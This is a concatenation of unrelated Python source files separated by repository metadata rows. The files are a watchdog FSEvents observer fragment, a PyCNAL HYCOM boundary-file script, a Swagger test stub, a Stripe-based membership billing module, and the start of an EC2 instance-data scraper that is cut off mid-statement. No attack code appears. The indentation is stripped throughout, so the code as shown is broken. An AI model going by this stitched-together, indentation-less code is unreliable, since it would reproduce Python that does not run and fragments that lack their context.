A watch object representing the directory to monitor.
:type watch:
:class:`watchdog.observers.api.ObservedWatch`
:param timeout:
Read events blocking timeout (in seconds).
:type timeout:
``float``
"""
def __init__(self, event_queue, watch, timeout=DEFAULT_EMITTER_TIMEOUT):
EventEmitter.__init__(self, event_queue, watch, timeout)
self._lock = threading.Lock()
self.snapshot = DirectorySnapshot(watch.path, watch.is_recursive)
def on_thread_stop(self):
_fsevents.remove_watch(self.watch)
_fsevents.stop(self)
def queue_events(self, timeout):
with self._lock:
if not self.watch.is_recursive\
and self.watch.path not in self.pathnames:
return
new_snapshot = DirectorySnapshot(self.watch.path,
self.watch.is_recursive)
events = new_snapshot - self.snapshot
self.snapshot = new_snapshot
# Files.
for src_path in events.files_deleted:
self.queue_event(FileDeletedEvent(src_path))
for src_path in events.files_modified:
self.queue_event(FileModifiedEvent(src_path))
for src_path in events.files_created:
self.queue_event(FileCreatedEvent(src_path))
for src_path, dest_path in events.files_moved:
self.queue_event(FileMovedEvent(src_path, dest_path))
# Directories.
for src_path in events.dirs_deleted:
self.queue_event(DirDeletedEvent(src_path))
for src_path in events.dirs_modified:
self.queue_event(DirModifiedEvent(src_path))
for src_path in events.dirs_created:
self.queue_event(DirCreatedEvent(src_path))
for src_path, dest_path in events.dirs_moved:
self.queue_event(DirMovedEvent(src_path, dest_path))
def run(self):
try:
def callback(pathnames, flags, emitter=self):
emitter.queue_events(emitter.timeout)
# for pathname, flag in zip(pathnames, flags):
# if emitter.watch.is_recursive: # and pathname != emitter.watch.path:
# new_sub_snapshot = DirectorySnapshot(pathname, True)
# old_sub_snapshot = self.snapshot.copy(pathname)
# diff = new_sub_snapshot - old_sub_snapshot
# self.snapshot += new_subsnapshot
# else:
# new_snapshot = DirectorySnapshot(emitter.watch.path, False)
# diff = new_snapshot - emitter.snapshot
# emitter.snapshot = new_snapshot
# INFO: FSEvents reports directory notifications recursively
# by default, so we do not need to add subdirectory paths.
#pathnames = set([self.watch.path])
# if self.watch.is_recursive:
# for root, directory_names, _ in os.walk(self.watch.path):
# for directory_name in directory_names:
# full_path = absolute_path(
# os.path.join(root, directory_name))
# pathnames.add(full_path)
self.pathnames = [self.watch.path]
_fsevents.add_watch(self,
self.watch,
callback,
self.pathnames)
_fsevents.read_events(self)
except Exception as e:
pass
class FSEventsObserver(BaseObserver):
def __init__(self, timeout=DEFAULT_OBSERVER_TIMEOUT):
BaseObserver.__init__(self, emitter_class=FSEventsEmitter,
timeout=timeout)
def schedule(self, event_handler, path, recursive=False):
# Python 2/3 compat
try:
str_class = unicode
except NameError:
str_class = str
# Fix for issue #26: Trace/BPT error when given a unicode path
# string. https://github.com/gorakhargosh/watchdog/issues#issue/26
if isinstance(path, str_class):
#path = unicode(path, 'utf-8')
path = unicodedata.normalize('NFC', path)
# We only encode the path in Python 2 for backwards compatibility.
# On Python 3 we want the path to stay as unicode if possible for
# the sake of path matching not having to be rewritten to use the
# bytes API instead of strings. The _watchdog_fsevent.so code for
# Python 3 can handle both str and bytes paths, which is why we
# do not HAVE to encode it with Python 3. The Python 2 code in
# _watchdog_fsevents.so was not changed for the sake of backwards
# compatibility.
if sys.version_info < (3,):
path = path.encode('utf-8')
return BaseObserver.schedule(self, event_handler, path, recursive)
| 37.820809
| 82
| 0.631667
|
d202291fe501bf207705ef5fda9e48ae11943a63
| 2,692
|
py
|
Python
|
examples/Palau_HYCOM/make_bdry_file.py
|
ESMG/PyCNAL_legacy
|
a4f6547bce872068a5bb5751231017bc3e4a4503
|
[
"BSD-3-Clause"
] | null | null | null |
examples/Palau_HYCOM/make_bdry_file.py
|
ESMG/PyCNAL_legacy
|
a4f6547bce872068a5bb5751231017bc3e4a4503
|
[
"BSD-3-Clause"
] | 3
|
2018-01-23T23:23:24.000Z
|
2018-02-07T22:37:28.000Z
|
examples/Palau_HYCOM/make_bdry_file.py
|
ESMG/PyCNAL_legacy
|
a4f6547bce872068a5bb5751231017bc3e4a4503
|
[
"BSD-3-Clause"
] | null | null | null |
import matplotlib
matplotlib.use('Agg')
import subprocess
import os
import sys
from multiprocessing import Pool
from functools import partial
import numpy as np
#import pdb
#increase the maximum number of open files allowed
#import resource
#resource.setrlimit(resource.RLIMIT_NOFILE, (3000,-1))
import pycnal
import pycnal_toolbox
from remap_bdry import remap_bdry
from remap_bdry_uv import remap_bdry_uv
data_dir = '/archive/u1/uaf/kate/HYCOM/SCS/data/'
dst_dir='./bdry/'
def do_file(file, src_grd, dst_grd):
zeta = remap_bdry(file, 'ssh', src_grd, dst_grd, dst_dir=dst_dir)
dst_grd = pycnal.grid.get_ROMS_grid('PALAU1', zeta=zeta)
remap_bdry(file, 'temp', src_grd, dst_grd, dst_dir=dst_dir)
remap_bdry(file, 'salt', src_grd, dst_grd, dst_dir=dst_dir)
# pdb.set_trace()
remap_bdry_uv(file, src_grd, dst_grd, dst_dir=dst_dir)
# merge file
bdry_file = dst_dir + file.rsplit('/')[-1][:-3] + '_bdry_' + dst_grd.name + '.nc'
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_ssh_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-O', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_temp_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_salt_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_u_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
out_file = dst_dir + file.rsplit('/')[-1][:-3] + '_v_bdry_' + dst_grd.name + '.nc'
command = ('ncks', '-a', '-A', out_file, bdry_file)
subprocess.call(command)
os.remove(out_file)
year = int(sys.argv[1])
#lst_year = sys.argv[1:]
lst_year = [year]
lst_file = []
for year in lst_year:
year = np.str(year)
command = 'ls ' + data_dir + 'HYCOM_GLBa0.08_' + year + '*'
lst = subprocess.check_output(command, shell=True)
lst = lst.split()
lst_file = lst_file + lst
print('Build OBC file from the following file list:')
print(lst_file)
print(' ')
src_grd_file = data_dir + '../HYCOM_GLBa0.08_PALAU_grid.nc'
src_grd = pycnal_toolbox.Grid_HYCOM.get_nc_Grid_HYCOM(src_grd_file)
dst_grd = pycnal.grid.get_ROMS_grid('PALAU1')
processes = 4
p = Pool(processes)
# Trick to pass more than one arg
partial_do_file = partial(do_file, src_grd=src_grd, dst_grd=dst_grd)
results = p.map(partial_do_file, lst_file)
| 32.829268
| 89
| 0.677935
|
618528c70a84476e40d387b613e773eb1b9841ff
| 21
|
py
|
Python
|
aliyun-python-sdk-oos/aliyunsdkoos/__init__.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 1,001
|
2015-07-24T01:32:41.000Z
|
2022-03-25T01:28:18.000Z
|
aliyun-python-sdk-oos/aliyunsdkoos/__init__.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 363
|
2015-10-20T03:15:00.000Z
|
2022-03-08T12:26:19.000Z
|
aliyun-python-sdk-oos/aliyunsdkoos/__init__.py
|
yndu13/aliyun-openapi-python-sdk
|
12ace4fb39fe2fb0e3927a4b1b43ee4872da43f5
|
[
"Apache-2.0"
] | 682
|
2015-09-22T07:19:02.000Z
|
2022-03-22T09:51:46.000Z
|
__version__ = '1.5.0'
| 21
| 21
| 0.666667
|
fdd834377560b818e5d8adf51e4f042776881e72
| 982
|
py
|
Python
|
kapua-client/python-client/test/test_device_configuration.py
|
liang-faan/SmartIOT-Diec
|
8336a4b558295295f10a82cf350d8b7ff3fb9f5c
|
[
"MIT"
] | 5
|
2019-05-30T02:55:16.000Z
|
2020-03-03T14:18:23.000Z
|
kapua-client/python-client/test/test_device_configuration.py
|
liang-faan/SmartIOT-Diec
|
8336a4b558295295f10a82cf350d8b7ff3fb9f5c
|
[
"MIT"
] | 3
|
2019-12-27T00:53:23.000Z
|
2020-02-17T05:29:19.000Z
|
kapua-client/python-client/test/test_device_configuration.py
|
liang-faan/SmartIOT-Diec
|
8336a4b558295295f10a82cf350d8b7ff3fb9f5c
|
[
"MIT"
] | 4
|
2019-06-04T06:26:14.000Z
|
2021-01-07T04:25:32.000Z
|
# coding: utf-8
"""
Eclipse Kapua REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.device_configuration import DeviceConfiguration # noqa: E501
from swagger_client.rest import ApiException
class TestDeviceConfiguration(unittest.TestCase):
"""DeviceConfiguration unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDeviceConfiguration(self):
"""Test DeviceConfiguration"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.device_configuration.DeviceConfiguration() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 23.95122
| 119
| 0.721996
|
27d14c0ac221dc531e7a779e5dcef3dbcc2e684d
| 11,292
|
py
|
Python
|
web/src/p2k16/core/membership_management.py
|
eliasbakken/p2k16
|
44d443ed88932b6d24a77f87074e550195cce6b6
|
[
"MIT"
] | null | null | null |
web/src/p2k16/core/membership_management.py
|
eliasbakken/p2k16
|
44d443ed88932b6d24a77f87074e550195cce6b6
|
[
"MIT"
] | null | null | null |
web/src/p2k16/core/membership_management.py
|
eliasbakken/p2k16
|
44d443ed88932b6d24a77f87074e550195cce6b6
|
[
"MIT"
] | null | null | null |
import logging
from datetime import datetime, timedelta
from sqlalchemy import text, func
from typing import Mapping, Optional
import stripe
from p2k16.core import P2k16UserException, mail
from p2k16.core.models import db, Account, StripePayment, model_support, Membership, StripeCustomer, Company
logger = logging.getLogger(__name__)
def paid_members():
return Account.query. \
join(StripePayment, StripePayment.created_by_id == Account.id). \
filter(StripePayment.end_date >= (datetime.utcnow() - timedelta(days=1))). \
all()
def active_member(account: Account = None) -> bool:
"""
Verify that user is an active member of Bitraf either by paying or member of company
"""
# Check paying membership
if StripePayment.query. \
filter(StripePayment.created_by_id == account.id,
StripePayment.end_date >= (datetime.utcnow() - timedelta(days=1))).count() > 0:
return True
# Check company membership
if len(Company.find_active_companies_with_account(account.id)) > 0:
return True
return False
def get_membership(account: Account):
"""
Get membership info for account
:param account:
:return: Membership model
"""
return Membership.query.filter(Membership.created_by_id == account.id).one_or_none()
def get_membership_fee(account: Account):
"""
Get membership fee for account
:param account:
:return: Fee or None
"""
membership = get_membership(account)
if membership is None:
return None
else:
return membership.fee
def get_stripe_customer(account: Account):
"""
Get stripe customer for account
:param account:
:return: StripeCustomer model
"""
return StripeCustomer.query.filter(StripeCustomer.created_by_id == account.id).one_or_none()
def get_membership_payments(account: Account):
return StripePayment.query.filter(StripePayment.created_by_id == account.id).all()
def find_account_from_stripe_customer(stripe_customer_id) -> Optional[Account]:
"""
Get account from stripe customer
:param stripe_customer_id:
:return: account
"""
sc = StripeCustomer.query.filter(StripeCustomer.stripe_id == stripe_customer_id).one_or_none()
return Account.find_account_by_id(sc.created_by_id) if sc is not None else None
def parse_stripe_event(event):
logger.info("Received stripe event: id={id}, type={type}".format(id=event.id, type=event.type))
if event.type == 'invoice.created':
handle_invoice_created(event)
elif event.type == 'invoice.updated':
handle_invoice_updated(event)
elif event.type == 'invoice.payment_succeeded':
handle_payment_success(event)
elif event.type == 'invoice.payment_failed':
handle_payment_failed(event)
else:
pass # Not implemented on purpose
def handle_invoice_created(event):
pass
def handle_invoice_updated(event):
pass
def handle_payment_success(event):
customer_id = event.data.object.customer
account = find_account_from_stripe_customer(customer_id)
with model_support.run_as(account):
invoice_id = event.data.object.id
timestamp = datetime.fromtimestamp(event.data.object.date)
items = event.data.object.lines.data[0]
payment = StripePayment(invoice_id, datetime.fromtimestamp(items.period.start),
datetime.fromtimestamp(items.period.end), items.amount / 100, timestamp)
db.session.add(payment)
db.session.commit()
def handle_payment_failed(event):
pass
def member_get_details(account):
# Get mapping from account to stripe_id
stripe_customer_id = get_stripe_customer(account)
details = {}
try:
# Get payment details
details['card'] = "N / A"
details['card_exp'] = ""
details['stripe_price'] = "0"
details['stripe_subscription_status'] = "none"
if stripe_customer_id is not None:
# Get customer object
cu = stripe.Customer.retrieve(stripe_customer_id.stripe_id)
if len(cu.sources.data) > 0:
card = cu.sources.data[0]
details['card'] = "**** **** **** " + card.last4
details['card_exp'] = "%r/%r" % (card.exp_month, card.exp_year)
# Get stripe subscription to make sure it matches local database
assert len(cu.subscriptions.data) <= 1
for sub in cu.subscriptions.data:
details['stripe_subscription_status'] = sub.status
details['stripe_price'] = sub.plan.amount / 100
# Get current membership
membership = get_membership(account)
if membership is not None:
details['fee'] = membership.fee
details['first_membership'] = membership.first_membership
details['start_membership'] = membership.start_membership
else:
details['fee'] = 0
# Export payments
payments = []
for pay in get_membership_payments(account):
payments.append({
'id': pay.id,
'start_date': pay.start_date,
'end_date': pay.end_date,
'amount': float(pay.amount),
'payment_date': pay.payment_date
})
details['payments'] = payments
except stripe.error.StripeError:
raise P2k16UserException("Error reading data from Stripe. Contact kasserer@bitraf.no if the problem persists.")
return details
def member_set_credit_card(account, stripe_token):
# Get mapping from account to stripe_id
stripe_customer_id = get_stripe_customer(account)
try:
if stripe_customer_id is None:
# Create a new stripe customer and set source
cu = stripe.Customer.create(
description="Customer for %r" % account.name,
email=account.email,
source=stripe_token
)
stripe_customer_id = StripeCustomer(cu.stripe_id)
logger.info("Created customer for user=%r" % account.username)
else:
# Get customer object
cu = stripe.Customer.retrieve(stripe_customer_id.stripe_id)
if cu is None or (hasattr(cu, 'deleted') and cu.deleted):
logger.error("Stripe customer does not exist. This should not happen! account=%r, stripe_id=%r" %
(account.username, stripe_token))
raise P2k16UserException("Set credit card invalid state. Contact kasserer@bitraf.no")
# Create a new default card
new_card = cu.sources.create(source=stripe_token)
cu.default_source = new_card.id
cu.save()
# Delete any old cards
for card in cu.sources.list():
if card.id != new_card.id:
card.delete()
# Commit to db
db.session.add(stripe_customer_id)
db.session.commit()
# Check if there are any outstanding invoices on this account that needs billing
for invoice in stripe.Invoice.list(customer=cu.stripe_id):
if invoice.paid is False and invoice.closed is False and invoice.forgiven is False:
invoice.pay()
logger.info("Successfully updated credit card for user=%r" % account.username)
return True
except stripe.error.CardError as e:
err = e.json_body.get('error', {})
msg = err.get('message')
logger.info("Card processing failed for user=%r, error=%r" % (account.username, err))
raise P2k16UserException("Error updating credit card: %r" % msg)
except stripe.error.StripeError as e:
logger.error("Stripe error: " + repr(e.json_body))
raise P2k16UserException("Error updating credit card due to stripe error. Contact kasserer@bitraf.no if the "
"problem persists.")
def member_cancel_membership(account):
try:
# Update local db
membership = get_membership(account)
db.session.delete(membership)
# Update stripe
stripe_customer_id = get_stripe_customer(account)
for sub in stripe.Subscription.list(customer=stripe_customer_id):
sub.delete(at_period_end=True)
db.session.commit()
mail.send_membership_ended(account)
except stripe.error.StripeError as e:
logger.error("Stripe error: " + repr(e.json_body))
raise P2k16UserException("Stripe error. Contact kasserer@bitraf.no if the problem persists.")
def member_set_membership(account, membership_plan, membership_price):
# TODO: Remove membership_price and look up price from model
try:
membership = get_membership(account)
if membership_plan == 'none':
member_cancel_membership(account)
return True
# --- Update membership in local db ---
if membership is not None:
if membership.fee is membership_price:
# Nothing's changed.
logger.info("No membership change for user=%r, type=%r, amount=%r" % (
account.username, membership_plan, membership_price))
return
else:
membership.fee = membership_price
membership.start_membership = datetime.now()
else:
# New membership
membership = Membership(membership_price)
# --- Update membership in stripe ---
# Get customer object
stripe_customer_id = get_stripe_customer(account)
if stripe_customer_id is None:
raise P2k16UserException("You must set a credit card before changing plan.")
# Check for active subscription
subscriptions = stripe.Subscription.list(customer=stripe_customer_id)
if subscriptions is None or len(subscriptions) == 0:
sub = stripe.Subscription.create(customer=stripe_customer_id, items=[{"plan": membership_plan}])
else:
sub = next(iter(subscriptions), None)
stripe.Subscription.modify(sub.id, cancel_at_period_end=False,
items=[{
'id': sub['items']['data'][0].id,
'plan': membership_plan
}],
prorate=False)
# Commit to db
db.session.add(membership)
db.session.commit()
logger.info("Successfully updated membership type for user=%r, type=%r, amount=%r" % (
account.username, membership_plan, membership_price))
mail.send_new_member(account)
return True
except stripe.error.CardError as e:
err = e.json_body.get('error', {})
msg = err.get('message')
logger.info("Card processing failed for user=%r, error=%r" % (account.username, err))
raise P2k16UserException("Error charging credit card: %r" % msg)
except stripe.error.StripeError as e:
logger.error("Stripe error: " + repr(e.json_body))
raise P2k16UserException("Stripe error. Contact kasserer@bitraf.no if the problem persists.")
| 33.707463
| 119
| 0.632483
|
a414e1ae55f870fb74da9eba626a861260660ea8
| 30,233
|
py
|
Python
|
scrape.py
|
zeroc0d3/ec2instances.info
|
fbb48c6f494d4561422077a201fbdc2dee774d99
|
[
"MIT"
] | 3,046
|
2015-01-06T11:55:26.000Z
|
2021-02-10T15:21:27.000Z
|
scrape.py
|
zeroc0d3/ec2instances.info
|
fbb48c6f494d4561422077a201fbdc2dee774d99
|
[
"MIT"
] | 435
|
2015-01-11T00:57:25.000Z
|
2021-02-10T11:14:56.000Z
|
scrape.py
|
zeroc0d3/ec2instances.info
|
fbb48c6f494d4561422077a201fbdc2dee774d99
|
[
"MIT"
] | 442
|
2015-01-10T23:47:01.000Z
|
2021-02-10T13:18:08.000Z
|
#!/usr/bin/env python
from lxml import etree
import re
import json
import locale
import ec2
from six.moves.urllib import request as urllib2
# Following advice from https://stackoverflow.com/a/1779324/216138
# The locale must be installed in the system, and it must be one where ',' is
# the thousans separator and '.' is the decimal fraction separator.
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
class Instance(object):
def __init__(self):
self.arch = []
self.api_description = None
self.availability_zones = {}
self.base_performance = None
self.burst_minutes = None
self.clock_speed_ghz = None
self.compute_capability = 0
self.devices = 0
self.drive_size = None
self.ebs_iops = 0
self.ebs_max_bandwidth = 0
self.ebs_only = True
self.ebs_optimized = False
self.ebs_throughput = 0
self.ebs_as_nvme = False
self.ECU = 0
self.enhanced_networking = None
self.family = ''
self.FPGA = 0
self.generation = None
self.GPU = 0
self.GPU_memory = 0
self.GPU_model = None
self.includes_swap_partition = False
self.instance_type = ''
self.intel_avx = None
self.intel_avx2 = None
self.intel_avx512 = None
self.intel_turbo = None
self.linux_virtualization_types = []
self.memory = 0
self.network_performance = None
self.num_drives = None
self.nvme_ssd = False
self.physical_processor = None
self.placement_group_support = False
self.pretty_name = ''
self.pricing = {}
self.size = 0
self.ssd = False
self.storage_needs_initialization = False
self.trim_support = False
self.vCPU = 0
self.vpc = None
self.vpc_only = True
self.emr = False
def get_type_prefix(self):
"""h1, i3, d2, etc"""
return self.instance_type.split(".")[0]
def get_ipv6_support(self):
"""Fancy parsing not needed for ipv6 support.
"IPv6 is supported on all current generation instance types and the
C3, R3, and I2 previous generation instance types."
- https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html
FIXME: This should be a @property, but this project is still Python 2. Yikes!
"""
ipv4_only_families = ("cg1", "m1", "m3", "c1", "cc2", "g2", "m2", "cr1", "hs1", "t1")
return self.get_type_prefix() not in ipv4_only_families
def to_dict(self):
d = dict(family=self.family,
instance_type=self.instance_type,
pretty_name=self.pretty_name,
arch=self.arch,
vCPU=self.vCPU,
GPU=self.GPU,
GPU_model=self.GPU_model,
GPU_memory=self.GPU_memory,
compute_capability=self.compute_capability,
FPGA=self.FPGA,
ECU=self.ECU,
base_performance=self.base_performance,
burst_minutes=self.burst_minutes,
memory=self.memory,
ebs_optimized=self.ebs_optimized,
ebs_throughput=self.ebs_throughput,
ebs_iops=self.ebs_iops,
ebs_as_nvme=self.ebs_as_nvme,
ebs_max_bandwidth=self.ebs_max_bandwidth,
network_performance=self.network_performance,
enhanced_networking=self.enhanced_networking,
placement_group_support=self.placement_group_support,
pricing=self.pricing,
vpc=self.vpc,
linux_virtualization_types=self.linux_virtualization_types,
generation=self.generation,
vpc_only=self.vpc_only,
ipv6_support=self.get_ipv6_support(),
physical_processor=self.physical_processor,
clock_speed_ghz=self.clock_speed_ghz,
intel_avx=self.intel_avx,
intel_avx2=self.intel_avx2,
intel_avx512=self.intel_avx512,
intel_turbo=self.intel_turbo,
emr=self.emr,
availability_zones=self.availability_zones)
if self.ebs_only:
d['storage'] = None
else:
d['storage'] = dict(ssd=self.ssd,
trim_support=self.trim_support,
nvme_ssd=self.nvme_ssd,
storage_needs_initialization=self.storage_needs_initialization,
includes_swap_partition=self.includes_swap_partition,
devices=self.num_drives,
size=self.drive_size)
return d
def __repr__(self):
return "<Instance {}>".format(self.instance_type)
def sanitize_instance_type(instance_type):
"""Typos and other bad data are common in the instance type colums for some reason"""
# Remove random whitespace
instance_type = re.sub(r"\s+", "", instance_type, flags=re.UNICODE)
# Correct typos
typo_corrections = {
"x1.16large": "x1.16xlarge", # https://github.com/powdahound/ec2instances.info/issues/199
"i3.4xlxarge": "i3.4xlarge", # https://github.com/powdahound/ec2instances.info/issues/227
"i3.16large": "i3.16xlarge", # https://github.com/powdahound/ec2instances.info/issues/227
"p4d.2xlarge": "p4d.24xlarge", # as of 2020-11-15
}
return typo_corrections.get(instance_type, instance_type)
def totext(elt):
s = etree.tostring(elt, method='text', encoding='unicode').strip()
return re.sub(r'\*\d$', '', s)
def transform_size(size):
if size == 'u':
return 'micro'
if size == 'sm':
return 'small'
if size == 'med':
return 'medium'
m = re.search('^(x+)l$', size)
if m:
xs = len(m.group(1))
if xs == 1:
return 'xlarge'
else:
return str(xs) + 'xlarge'
assert size == 'lg', "Unable to parse size: %s" % (size,)
return 'large'
def transform_region(reg):
region_map = {
'eu-ireland': 'eu-west-1',
'eu-frankfurt': 'eu-central-1',
'apac-sin': 'ap-southeast-1',
'apac-syd': 'ap-southeast-2',
'apac-tokyo': 'ap-northeast-1'}
if reg in region_map:
return region_map[reg]
m = re.search(r'^([^0-9]*)(-(\d))?$', reg)
assert m, "Can't parse region: %s" % (reg,)
base = m.group(1)
num = m.group(3) or '1'
return base + "-" + num
def add_ebs_pricing(imap, data):
for region_spec in data['config']['regions']:
region = transform_region(region_spec['region'])
for t_spec in region_spec['instanceTypes']:
typename = t_spec['type']
for i_spec in t_spec['sizes']:
i_type = i_spec['size']
if i_type not in imap:
print("ERROR: Got EBS pricing data for unknown instance type: {}".format(i_type))
continue
inst = imap[i_type]
inst.pricing.setdefault(region, {})
# print "%s/%s" % (region, i_type)
for col in i_spec['valueColumns']:
inst.pricing[region]['ebs'] = col['prices']['USD']
def add_pricing_info(instances):
for i in instances:
i.pricing = {}
by_type = {i.instance_type: i for i in instances}
ec2.add_pricing(by_type)
# EBS cost surcharge as per https://aws.amazon.com/ec2/pricing/on-demand/#EBS-Optimized_Instances
ebs_pricing_url = 'https://a0.awsstatic.com/pricing/1/ec2/pricing-ebs-optimized-instances.min.js'
pricing = fetch_data(ebs_pricing_url)
add_ebs_pricing(by_type, pricing)
def fetch_data(url):
content = urllib2.urlopen(url).read().decode()
try:
pricing = json.loads(content)
except ValueError:
# if the data isn't compatible JSON, try to parse as jsonP
json_string = re.search(r'callback\((.*)\);', content).groups()[0] # extract javascript object
json_string = re.sub(r"(\w+):", r'"\1":', json_string) # convert to json
pricing = json.loads(json_string)
return pricing
def add_eni_info(instances):
# Canonical URL for this info is https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.html
# eni_url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.partial.html"
# It seems it's no longer dynamically loaded
eni_url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.html"
tree = etree.parse(urllib2.urlopen(eni_url), etree.HTMLParser())
table = tree.xpath('//div[@class="table-contents"]//table')[1]
rows = table.xpath('.//tr[./td]')
by_type = {i.instance_type: i for i in instances}
for r in rows:
instance_type = etree.tostring(r[0], method='text').strip().decode()
max_enis = etree.tostring(r[1], method='text').decode()
# handle <cards>x<interfaces> format
if 'x' in max_enis:
parts = max_enis.split('x')
max_enis = locale.atoi(parts[0]) * locale.atoi(parts[1])
else:
max_enis = locale.atoi(max_enis)
ip_per_eni = locale.atoi(etree.tostring(r[2], method='text').decode())
if instance_type not in by_type:
print("WARNING: Ignoring ENI data for unknown instance type: {}".format(instance_type))
continue
if not by_type[instance_type].vpc:
print(f"WARNING: DescribeInstanceTypes API does not have network info for {instance_type}, scraping instead")
by_type[instance_type].vpc = { 'max_enis': max_enis,
'ips_per_eni': ip_per_eni }
def add_ebs_info(instances):
"""
Three tables on this page:
1: EBS optimized by default
Instance type | Maximum bandwidth (Mib/s) | Maximum throughput (MiB/s, 128 KiB I/O) | Maximum IOPS (16 KiB I/O)
2: Baseline performance metrics for instances with asterisk (unsupported for now, see comment below)
Instance type | Baseline bandwidth (Mib/s) | Baseline throughput (MiB/s, 128 KiB I/O) | Baseline IOPS (16 KiB I/O)
3: Not EBS optimized by default
Instance type | Maximum bandwidth (Mib/s) | Maximum throughput (MiB/s, 128 KiB I/O) | Maximum IOPS (16 KiB I/O)
TODO: Support the asterisk on type names in the first table, which means:
"These instance types can support maximum performance for 30 minutes at least once every 24 hours. For example,
c5.large instances can deliver 281 MB/s for 30 minutes at least once every 24 hours. If you have a workload
that requires sustained maximum performance for longer than 30 minutes, select an instance type based on the
following baseline performance."
"""
def parse_ebs_table(by_type, table, ebs_optimized_by_default):
for row in table.xpath('tr'):
if row.xpath('th'):
continue
cols = row.xpath('td')
instance_type = sanitize_instance_type(totext(cols[0]).replace("*", ""))
ebs_optimized_by_default = ebs_optimized_by_default
ebs_max_bandwidth = locale.atof(totext(cols[1]))
ebs_throughput = locale.atof(totext(cols[2]))
ebs_iops = locale.atof(totext(cols[3]))
if instance_type not in by_type:
print(f"ERROR: Ignoring EBS info for unknown instance {instance_type}")
by_type[instance_type] = Instance()
# continue
by_type[instance_type].ebs_optimized_by_default = ebs_optimized_by_default
by_type[instance_type].ebs_throughput = ebs_throughput
by_type[instance_type].ebs_iops = ebs_iops
by_type[instance_type].ebs_max_bandwidth = ebs_max_bandwidth
return by_type
by_type = {i.instance_type: i for i in instances}
# Canonical URL for this info is https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-optimized.html
# ebs_url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-optimized.partial.html"
# It seems it's no longer dynamically loaded
ebs_url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-optimized.html"
tree = etree.parse(urllib2.urlopen(ebs_url), etree.HTMLParser())
tables = tree.xpath('//div[@class="table-contents"]//table')
parse_ebs_table(by_type, tables[0], True)
parse_ebs_table(by_type, tables[2], False)
def add_linux_ami_info(instances):
"""Add information about which virtualization options are supported.
Note that only HVM is supported for Windows instances so that info is not
given its own column.
"""
checkmark_char = u'\u2713'
url = "http://aws.amazon.com/amazon-linux-ami/instance-type-matrix/"
tree = etree.parse(urllib2.urlopen(url), etree.HTMLParser())
table = tree.xpath('//div[@class="aws-table"]/table')[0]
rows = table.xpath('.//tr[./td]')[1:] # ignore header
for r in rows:
supported_types = []
family_id = totext(r[0]).lower()
if not family_id:
continue
# We only check the primary EBS-backed values here since the 'storage'
# column will already be able to tell users whether or not the instance
# they're looking at can use EBS and/or instance-store AMIs.
try:
if totext(r[1]) == checkmark_char:
supported_types.append('HVM')
if len(r) >= 4 and totext(r[3]) == checkmark_char:
supported_types.append('PV')
except Exception as e:
# 2018-08-01: handle missing cells on last row in this table...
print("Exception while parsing AMI info for {}: {}".format(family_id, e))
# Apply types for this instance family to all matching instances
for i in instances:
i_family_id = i.instance_type.split('.')[0]
if i_family_id == family_id:
i.linux_virtualization_types = supported_types
# http://aws.amazon.com/amazon-linux-ami/instance-type-matrix/ page is
# missing info about both older (t1, m1, c1, m2) and newer exotic (cg1,
# cr1, hi1, hs1, cc2) instance type generations.
# Adding "manual" info about older generations
# Some background info at https://github.com/powdahound/ec2instances.info/pull/161
for i in instances:
i_family_id = i.instance_type.split('.')[0]
if i_family_id in ('cc2', 'cg1', 'hi1', 'hs1'):
if not 'HVM' in i.linux_virtualization_types:
i.linux_virtualization_types.append('HVM')
if i_family_id in ('t1', 'm1', 'm2', 'c1', 'hi1', 'hs1'):
if not 'PV' in i.linux_virtualization_types:
i.linux_virtualization_types.append('PV')
def add_vpconly_detail(instances):
# A few legacy instances can be launched in EC2 Classic, the rest is VPC only
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-classic-platform.html#ec2-classic-instance-types
classic_families = ("m1", "m3", "t1", "c1", "c3", "cc2", "cr1", "m2", "r3", "d2", "hs1", "i2", "g2")
for i in instances:
for family in classic_families:
if i.instance_type.startswith(family):
i.vpc_only = False
def add_instance_storage_details(instances):
"""Add information about instance storage features."""
# Canonical URL for this info is http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html
# url = "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.partial.html"
# It seems it's no longer dynamically loaded
url = "http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html"
tree = etree.parse(urllib2.urlopen(url), etree.HTMLParser())
table = tree.xpath('//div[@class="table-contents"]/table')[0]
rows = table.xpath('.//tr[./td]')
checkmark_char = u'\u2714'
dagger_char = u'\u2020'
for r in rows:
columns = r.xpath('.//td')
(instance_type,
storage_volumes,
storage_type,
